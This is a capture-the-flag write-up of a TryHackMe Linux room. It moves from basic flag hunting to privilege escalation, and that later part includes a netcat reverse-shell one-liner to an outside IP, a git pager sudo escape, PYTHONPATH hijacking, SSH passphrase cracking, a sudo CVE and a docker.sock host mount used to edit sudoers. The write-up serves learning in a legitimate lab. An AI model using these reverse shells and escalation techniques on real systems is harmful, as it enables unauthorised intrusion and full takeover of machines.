TryHackMe-Linux Agency

First we are told to ssh into the box using the creds

username:agent47 password:640509040147

Linux Fundamentals

Mission 1 Flag

As from the ssh banner we got the flag for mission 1

Mission 2 Flag

Use the previous flag to login to mission1 user

In mission1’s home directory you will find the flag for mission2 and you can the login with it to next user or in this case next mission

Mission 3 flag

Going to mission’2 home directory you will see flag.txt which holds flag for this mission

Mission 4 flag

Switch user to mission3 with the previous flag found

It seems there is no flag in the text file this time so we need to search around for the flag

Running grep -rnw /home -e 'mission4' I saw end of the flag in the same message

Opening it with vi editor I found the flag

Mission 5 flag

Switch user to mission4 with the flag found

Head over to mission’s 5 home directory

And you’ll find flag for the next mission

Mission 6 flag

Mission 7 flag

This was quite easy because all we have to do is ls -la

Mission 8 flag

Using the previous flag switch to mission7 user

Mission 9 flag

There was no flag in the home directory let’s see if we can find anything in root directory (/)

Mission 10 flag

We only see rockyou.txt

Doing a grep for mission10 you will find your flag

Mission 11 flag

We see a bunch of directories in mission10’s home directory so we have to look for mission11 string in these directories

Mission 12 flag

Reading .bashrc

Mission 13 flag

flag.txt is in home directory of mission13 but it doesn't have any permission so use chmod to change permissions

Mission 14 flag

Mission 15 flag

This is looking like stream of binary so let’s hop over to cyberchef

Mission 16 flag

This representation looks like hex because of D in the string

Mission 17 flag

Here we have a flag binary but doesn't have any permissions so set execute flag on the binary

Mission 18 flag

It seems we have an ecnrypted string and which is being decrpyted so we need to run the java file to get the flag

Mission 19 flag

Here we have the same scenario but it is written in ruby language

Mission 20 flag

Again same thing we need to compile the c program and run it

Mission 21 flag

Mission 22 flag

Again the flag is hidden in .bashrc

Mission 23 flag

We get spawn into a python interactive shell

Mission 24 flag

We get a message from text file but I didn’t get it until I saw /etc/hosts

Where localhost was resolving into mission24.com which tells that there is a webpage

Mission 25 flag

Here bribe is a binary file so on running

Transfer the binary to your machine for analyzing

Right in the beginning we can it’s storing an environmental variable in a variable named _s1 and it's checking if it contains the string "money" so we just have to export a variable named pocket with value money in terminal

Mission 26 flag

This tells me that there is something wrong with the PATH so let’s export the PATH

Mission 27 flag

Running the strings command on the jpg file we will get our flag

Mission 28 flag

Extract the archive (gzip) file I have transfered it to my machine

Then use hexeditor to view the content in the jpg file which is acutally a gif image file

Mission 29 flag

This irb is a ruby prompt

Mission 30 flag

Vikto’s Flag

Privilege Escalation

What is dalia’s flag?

We can see a cronjob in which script is running as user dalia

But when we try to overwrite the content of the 47.sh script it will not be executed because it is being paused with sleep 30 which wil pause the execution for 30 seconds and at the same the the same script will be overwritten as a root user and then the ownership will be changed to viktor so we need to somehow prevent the sleep command so we exploit PATH variable and replace the sleep command with anything

Here as you can see I made a sleep file in which I just added a bash command which will not spawn a shell but will overwrite the actual sleep command

Added PATH variable for that file

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.54.209 1234 >/tmp/f

Add a netcat reverse shell

And boom we get a shell as user dalia

What is silvio’s flag?

Doing sudo -l

We can see that this user can run zip as user silvio

What is reza’s flag?

Running sudo -l on this user

Now we will be able to escalate our privileges to rez through git

sudo -u reza PAGER='sh -c "exec sh 0<&1"' /usr/bin/git -p help

What is jordan’s flag?

Now this time we can run a python script as user jordan

On running we get an error because there is no python module named shop. What we can do is create a python module in the same directory where the script is and in it spawn a shell.

echo 'import os;os.system("/bin/bash")'  > shop.py

But what is happening with SETENV is that it’s setting the PYTHONPATH to default SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py which will lead us to PYTHONPATH Hijacking

What is ken’s flag?

Here we can see less can be run as user ken so we can utilize to escalate our privileges

What is sean’s flag?

This one is pretty easy similar to less and this is one of the most common privilege escaltion we encounter in CTF’s

Then just do !/bin/sh

But we don’t see any flag here. Looking at the groups for sean we see that he belongs to adm which can look on system logs

What is penelope’s flag?

Switch user to penelope with the password found in the logs which is base64 enccoded p3nelope

What is maya’s flag?

Since that base64 binary has an SUID so we can read any file by encoding it through base64 and then decoding it

What is robert’s Passphrase?

We see ssh keys , if your faimilar with ssh keys usually when we login with id_rsa it can sometimes be protected with a passpharse so let’s transfer the private key to our machine and give it to ssh2john so we can get a hash and then crack it with johntheripper

And we found the passphrase!. industryweapon

What is user.txt?

Here it says about entrypoint at localhost

We can see 2 local ports that is intersting , we already saw port 80 now lets see what service is running on port 2222

SSH is running so we can try to login as robert using the private key along with the passphrase

Checking for what robert can run as a superuser in docker environment

Since sudo version is 1.8.21 and we can see there is ! in sudoers there is a CVE for this which is CVE-2019-14287

What is root.txt?

When we try to see what is the image name for docker conatainer we get a permission denied

To overcome this we need change permisisons of docker.sock which is used to communicate with the main docker daemon (process) by default. It is the entry point for a Docker API. This socket is used by Docker CLI by default to execute docker commands. Default location for the socket is /run/docker.sock

Now if we do docker images

We can see the name so now we can mount the host file system on the docker container

Becoming root on the host machine

Since we have mounted the host file system on the docker container and we are root we can pretty much do anything , for example if I modify sudoers file it will take effect on the actual host machine so what we can do is edit the maya user’s premisison to let me execute anything

BS CS undergraduate | CTF Player